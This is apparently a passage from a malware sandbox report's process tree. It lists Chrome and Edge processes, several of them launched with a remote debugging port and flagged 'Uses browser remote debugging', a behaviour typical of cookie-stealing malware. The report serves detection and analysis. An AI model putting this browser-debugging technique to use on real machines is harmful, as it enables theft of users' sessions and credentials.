        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x21c,0x220,0x224,0x1f8,0x228,0x7ffe6b04cc40,0x7ffe6b04cc4c,0x7ffe6b04cc58
        6⤵
        
        PID:5592
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2468,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=2464 /prefetch:2
        6⤵
        
        PID:12804
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=556,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=2508 /prefetch:3
        6⤵
        
        PID:12828
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2036,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=2416 /prefetch:8
        6⤵
        
        PID:12856
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3160,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3204 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:13180
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3168,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=3196 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:13188
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4360,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4380 /prefetch:2
        6⤵
        Uses browser remote debugging
        
        PID:13296
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9223 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4672,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4660 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:9904
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4616,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4568 /prefetch:8
        6⤵
        
        PID:10144
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4604,i,8945985861178592250,12895043297601250909,262144 --variations-seed-version=20250217-180411.635000 --mojo-platform-channel-handle=4964 /prefetch:8
        6⤵
        
        PID:10152
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:5668
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ffe7ec746f8,0x7ffe7ec74708,0x7ffe7ec74718
        6⤵
        
        PID:8096
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1980 /prefetch:2
        6⤵
        
        PID:10840
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2508 /prefetch:3
        6⤵
        
        PID:10860
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2920 /prefetch:8
        6⤵
        
        PID:7756
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3268 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:10944
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3280 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:3856
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4444 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11848
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=1968,17898668758316316178,3580543640264355794,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4716 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:1336
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:9380
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ffe7ec746f8,0x7ffe7ec74708,0x7ffe7ec74718
        6⤵
        
        PID:9420
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2052,10946066209508431948,16228435989504517166,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
        6⤵
        
        PID:12632
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2052,10946066209508431948,16228435989504517166,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2388 /prefetch:3
        6⤵
        
        PID:5164
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:12956
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x128,0x12c,0x130,0x104,0x134,0x7ffe7ec746f8,0x7ffe7ec74708,0x7ffe7ec74718
        6⤵
        
        PID:10656
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
        6⤵
        
        PID:5888
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2472 /prefetch:3
        6⤵
        
        PID:11116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2512 /prefetch:8
        6⤵
        
        PID:10896
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3512 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11496
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3520 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:11448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2064 /prefetch:2
        6⤵
        
        PID:10460
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=4956 /prefetch:2
        6⤵
        
        PID:10444
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2272 /prefetch:2
        6⤵
        
        PID:4580
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2416 /prefetch:2
        6⤵
        
        PID:3700
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:9784
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5028 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:9864
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2044 /prefetch:2
        6⤵
        
        PID:2452
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2356 /prefetch:2
        6⤵
        
        PID:3880
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=3628 /prefetch:2
        6⤵
        
        PID:12588
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2036,10705058840303930363,7972801785557851386,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=disabled --mojo-platform-channel-handle=2140 /prefetch:2
        6⤵
        
        PID:12684
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default"
        5⤵
        Uses browser remote debugging
        
        PID:10200
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x148,0x14c,0x150,0x124,0x154,0x7ffe7ec746f8,0x7ffe7ec74708,0x7ffe7ec74718
        6⤵
        
        PID:4776
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
        6⤵
        
        PID:8628
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2468 /prefetch:3
        6⤵
        
        PID:9648
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3168 /prefetch:8
        6⤵
        
        PID:3684
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3676 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:12976
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --remote-debugging-port=9223 --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3696 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:4224
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2132 /prefetch:2
        6⤵
        
        PID:9852
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2056 /prefetch:2
        6⤵
        
        PID:9984
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2064,15151550141968008154,13710084585861880321,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=2696 /prefetch:2
        6⤵
        
        PID:10776
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
